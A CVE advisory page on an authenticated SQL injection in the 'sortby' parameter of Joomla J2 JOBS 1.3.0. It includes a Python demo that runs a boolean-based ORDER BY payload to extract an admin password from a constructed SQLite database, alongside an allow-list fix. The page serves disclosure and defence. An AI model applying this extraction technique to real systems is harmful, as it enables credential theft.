CVE-2020-37226
Description
Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information using automated tools.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Joomla J2 JOBS 1.3.0 has an authenticated SQL injection in the 'sortby' parameter, allowing attackers to extract database info.
The vulnerability is an authenticated SQL injection in Joomla J2 JOBS version 1.3.0. The 'sortby' parameter, which selects the sort column for job listings in the administrator interface, is not validated before it is placed into the query, so an attacker can inject arbitrary SQL. A sort parameter of this kind normally ends up in the ORDER BY clause, which cannot be passed as a bound parameter, so prepared statements alone do not close this class of hole; the column name has to be checked against a fixed list of permitted values.
An attacker must be authenticated to the Joomla administrator panel. The attack is a crafted POST request to /administrator/index.php with the SQL payload in the 'sortby' parameter. Automated tools such as sqlmap can drive the extraction, as demonstrated in the public exploit [3]. The vulnerable endpoint is reachable with any valid administrator-panel session cookie; no privilege beyond that login is required.
Successful exploitation allows an attacker to read sensitive data from the underlying database, including user credentials, configuration details, and other application data. Because the database may contain hashed passwords and personal information, this can lead to further compromise of the application and its users [4].
As of the advisory publication no patched version is listed on this page. Until the vendor ships a security update [1][2], restrict the 'sortby' parameter to a fixed allow-list of sortable column names and reject everything else; generic input sanitization or escaping is not a sufficient fix for a value that is spliced into an ORDER BY clause. Because exploitation requires an administrator-panel login, limiting that access to trusted accounts reduces exposure, but it does not remove the vulnerability.
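The mechanics and the fix described above, as an added example that is not part of this page, the J2 JOBS component or the cited exploit: a Python/SQLite model of a 'sortby' value concatenated into ORDER BY, the boolean-based data extraction such an injection permits (the kind of oracle sqlmap automates), and the allow-list rewrite that closes it. The jobs and users tables, their rows and the admin password are constructed for the demo; SQLite stands in for MySQL and the schema is not the component's real one.

```python
"""Model of the 'sortby' (ORDER BY) injection described above and its fix.

Added illustration, not J2 JOBS code and not the public exploit. SQLite
stands in for MySQL; the jobs/users tables and their contents are constructed
for the demo and are not the component's real schema.
"""
import sqlite3

# Constructed sample data. Ids are assigned so that sorting by id and
# sorting by title give different orders; the oracle below relies on that.
SCHEMA = """
CREATE TABLE jobs(id INTEGER PRIMARY KEY, title TEXT, created TEXT);
INSERT INTO jobs(title, created) VALUES
    ('Manager',  '2020-01-02'),
    ('Analyst',  '2020-01-03'),
    ('Engineer', '2020-01-01');
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users(username, password) VALUES ('admin', 'secret');
"""


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_jobs_vulnerable(conn, sortby):
    """The bug pattern: the request parameter is concatenated into ORDER BY.

    ORDER BY cannot take a bound parameter, so code that wants a user-chosen
    sort column often builds the clause by string concatenation. Anything the
    client puts in 'sortby' becomes SQL.
    """
    sql = "SELECT id, title FROM jobs ORDER BY " + sortby
    return [title for _id, title in conn.execute(sql)]


# Hardened pattern: map the client-supplied name onto a fixed allow-list.
# Keys are what the request may contain, values are the SQL identifiers used.
SORTABLE_COLUMNS = {"id": "id", "title": "title", "created": "created"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_jobs_safe(conn, sortby, direction="asc"):
    """Same query, but only allow-listed identifiers ever reach the SQL text."""
    column = SORTABLE_COLUMNS.get(sortby)
    order = SORT_DIRECTIONS.get(direction.lower())
    if column is None or order is None:
        raise ValueError(f"rejected sort parameters: {sortby!r}, {direction!r}")
    sql = f"SELECT id, title FROM jobs ORDER BY {column} {order}"
    return [title for _id, title in conn.execute(sql)]


def oracle_payload(position, guess):
    """Boolean-based ORDER BY payload.

    The sort key depends on whether one character of the admin password was
    guessed correctly, so the order of the returned rows leaks that bit.
    """
    return (
        "(CASE WHEN (SELECT substr(password, {p}, 1) FROM users "
        "WHERE username = 'admin') = '{g}' THEN title ELSE id END)"
    ).format(p=position, g=guess.replace("'", "''"))


def extract_password(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover the admin password through the vulnerable listing, one
    character per guess, which is what a tool such as sqlmap automates."""
    order_if_true = list_jobs_vulnerable(conn, "title")
    order_if_false = list_jobs_vulnerable(conn, "id")
    assert order_if_true != order_if_false, "oracle needs two distinguishable orders"
    recovered = ""
    for position in range(1, max_len + 1):
        for guess in alphabet:
            if list_jobs_vulnerable(conn, oracle_payload(position, guess)) == order_if_true:
                recovered += guess
                break
        else:
            break  # no character matched: reached the end of the string
    return recovered


if __name__ == "__main__":
    db = connect()
    print("leaked via vulnerable ORDER BY:", extract_password(db))
    print("safe listing by created date :", list_jobs_safe(db, "created", "desc"))
    try:
        list_jobs_safe(db, oracle_payload(1, "s"))
    except ValueError as exc:
        print("safe listing rejected payload:", exc)
```

The vulnerable function never errors: every payload is syntactically valid SQL, which is why this bug is easy to miss in testing and easy for an automated tool to exploit. The hardened version treats 'sortby' as a key into a table the server owns rather than as text, so the client can influence which permitted column is used but never what SQL runs.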
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (4)
News mentions (0)
No linked articles in our index yet.